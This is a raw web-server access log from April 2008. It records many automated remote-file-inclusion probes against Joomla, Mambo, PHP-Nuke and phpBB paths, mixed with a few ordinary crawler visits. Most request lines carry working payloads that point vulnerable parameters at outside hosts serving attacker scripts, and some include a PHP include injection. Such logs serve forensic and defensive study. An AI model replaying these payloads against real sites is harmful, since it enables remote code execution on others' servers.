62.75.224.203 - - [29/Apr/2008:10:37:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:37:29 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:37:46 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:37:46 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:37:46 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:37:53 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:38:16 -0700] "GET /logs/config.php?path_to_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:10:38:17 -0700] "GET /config.php?path_to_root=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:10:38:22 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
190.54.49.157 - - [29/Apr/2008:10:38:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:10:38:29 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.54.49.157 - - [29/Apr/2008:10:38:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:38:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:10:38:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:10:39:26 -0700] "GET /logs/access_080215.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.123.108.73 - - [29/Apr/2008:10:40:36 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:40:45 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:40:45 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:40:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:40:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:41:06 -0700] "GET /logs/access_080329.log/index2.php?content=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:41:06 -0700] "GET /index2.php?content=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:41:07 -0700] "GET /logs/index2.php?content=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.49.157 - - [29/Apr/2008:10:41:10 -0700] "GET //skin/zero_vote/error.php?dir=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
190.54.49.157 - - [29/Apr/2008:10:41:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:41:22 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:41:23 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [29/Apr/2008:10:41:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:10:41:28 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:10:41:28 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.236.106 - - [29/Apr/2008:10:41:42 -0700] "GET /logs/access_080215.log//index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cikal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:10:41:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.236.106 - - [29/Apr/2008:10:41:42 -0700] "GET /logs//index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cikal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.212.224.145 - - [29/Apr/2008:10:41:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.179 - - [29/Apr/2008:10:41:54 -0700] "GET /bikes/dteel/WeSTOC07/?D=A HTTP/1.0" 200 690 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:10:42:04 -0700] "GET /!scanhttp://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:10:42:04 -0700] "GET /logs/!scanhttp://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:42:11 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:10:42:13 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:42:17 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [29/Apr/2008:10:42:18 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:10:42:19 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:10:42:19 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.236.106 - - [29/Apr/2008:10:42:20 -0700] "GET /logs/access.log//index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.geocities.com/inkamarsya/cikal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:42:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:42:32 -0700] "GET //skin/zero_vote/error.php?dir=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:43:24 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:43:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:43:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:43:49 -0700] "GET /logs/access.log//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:43:49 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:43:49 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:43:54 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:10:43:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:43:59 -0700] "GET /logs/access.log//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:43:59 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:43:59 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:43:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:10:43:59 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:10:43:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [29/Apr/2008:10:44:07 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:44:18 -0700] "GET /logs/index.php?site1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:44:22 -0700] "GET /index.php?site1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:10:44:23 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:44:27 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:44:31 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:44:31 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:44:32 -0700] "GET /logs/access_080229.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.133.81 - - [29/Apr/2008:10:45:04 -0700] "GET /page.php5?id=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.169 - - [29/Apr/2008:10:45:14 -0700] "GET /bikes/dteel/WeSTOC07/?S=A HTTP/1.0" 200 690 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
82.96.81.29 - - [29/Apr/2008:10:45:27 -0700] "GET /logs/access_080201.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.179 - - [29/Apr/2008:10:45:55 -0700] "GET /bikes/dteel/WeSTOC07/?M=A HTTP/1.0" 200 690 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.179 - - [29/Apr/2008:10:45:55 -0700] "GET /bikes/dteel/WeSTOC07/?S=D HTTP/1.0" 200 690 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:46:06 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:46:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.61 - - [29/Apr/2008:10:46:21 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.61 - - [29/Apr/2008:10:46:21 -0700] "GET /SQuery/lib/gore.php?libpath=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:46:27 -0700] "GET /logs/access_080225.log/administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:46:28 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:10:46:28 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?GLOBALS[mosConfig_absolute_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.113.18 - - [29/Apr/2008:10:46:29 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.212.224.181 - - [29/Apr/2008:10:46:35 -0700] "GET /bikes/dteel/WeSTOC07/?N=A HTTP/1.0" 200 690 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [29/Apr/2008:10:46:35 -0700] "GET /bikes/dteel/WeSTOC07/?N=D HTTP/1.0" 200 690 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:10:46:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:10:46:44 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:46:56 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:10:46:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:10:46:58 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.1.143 - - [29/Apr/2008:10:46:58 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/tsu/styel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.212.224.179 - - [29/Apr/2008:10:47:15 -0700] "GET /bikes/dteel/2008_02_23/?D=A HTTP/1.0" 200 1540 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:47:22 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:47:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:10:47:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:10:47:51 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.212.224.169 - - [29/Apr/2008:10:47:56 -0700] "GET /bikes/dteel/2008_02_23/?S=A HTTP/1.0" 200 1540 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:47:59 -0700] "GET /logs/index.php?site1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:10:48:03 -0700] "GET /index.php?site1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:10:48:09 -0700] "GET /logs/access_080215.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:10:48:22 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:10:48:23 -0700] "GET /SQuery/lib/gore.php?libpath=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:48:24 -0700] "GET /logs/index.php?site1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:10:48:30 -0700] "GET /index.php?site1=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
217.212.224.159 - - [29/Apr/2008:10:48:37 -0700] "GET /bikes/dteel/2008_02_23/?M=A HTTP/1.0" 200 1540 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
74.6.22.121 - - [29/Apr/2008:10:48:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.35 - - [29/Apr/2008:10:48:40 -0700] "GET /bikes/dteel/140CANON/?S=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.93.54.47 - - [29/Apr/2008:10:48:47 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.47 - - [29/Apr/2008:10:48:48 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:10:49:04 -0700] "GET //catalogshop.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:10:49:04 -0700] "GET /logs//catalogshop.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
